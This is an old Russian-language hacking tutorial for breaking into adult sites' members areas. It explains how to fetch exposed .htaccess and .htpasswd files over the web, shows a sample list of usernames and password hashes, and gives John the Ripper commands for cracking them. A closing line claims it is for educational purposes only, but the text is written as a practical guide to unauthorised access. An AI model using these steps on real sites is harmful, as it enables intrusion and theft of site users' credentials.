div.main {margin-left: 20pt; margin-right: 20pt}Как ломать ХХХ сайты.
Шаг (1) Идите сами знаете куда и возьмите там работающий
пароль к сайту который вы хотите взломать.
Шаг
(2) Затем вы должны войти на этот xxx сайт в "members
section" ну например так www.xxxsite.com/members/index.html или типа
этого..
Шаг (3) Удалите слово index.html и наберите
.htaccess например: www.xxxsite.com/members/.htaccess
Если
вам повезет вы получите нижеследующее:AuthUserFile /www/xxxsite/members/.htpasswd <-
место где лежит файл с паролями.AuthGroupFile /dev/null <- место где лежит
groupfileAuthName Members Only Directory
<-место где находится popup который просит вас ввести
password/loginAuthType Basic <- другие
типы авторизации apache btw. Limit GET
POST PUT <-require valid-user
<- Но реально вся эта лабуда не
нужна для начала если .htaccess прошел сразу вместо него пишите
.htpasswd и все OK.
Шаг (4), найдите passwordfile (
.htpasswd)
Шаг (5), удалите .htaccess и вместо
наберите ( .htpasswd ) например
:www.xxxsite.com/members/.htpasswd. После этого вы получите
passwordlist. Пароли будут зашифрованы. Это будет выглядеть
так:
ocean:q8ERltHeoxRG. sydgator:458mLs4euQHwo demi1:o7ad9QtJIklTY demi2:Fx93hhGP/oTs6Y 233244:ZXEHRGfdsL9E346 Первое
слово - логин , остальное после : пароли
Шаг (6) Чтобы раскодировать пароли
надо сначала скачать декодер ,например"John the ripper"
.John the ripper расшифрует пароли на это
уйдет примерно. ( 15000/сек. на 166mmx) Шаг (7), Сохраните
полученные логины и паролиШаг (8),
Разархивируйте John The Ripper и наберите: ( предварительно поместив текстовый файл в директорию
где лежит ripper) John xxx.txt -single
(Это самый быстрый способ и самый простой алгоритм.)
John xxx.txt -wordfile:password.lst (Это
посложней)
John xxx.txt -incremental (Это самый сложный
алгоритм и занимает время зато самый надежный)
Текст представлен
только для учебных целей.Не используйте его на практике.
Использование может повлечь за собой
проблемы.
|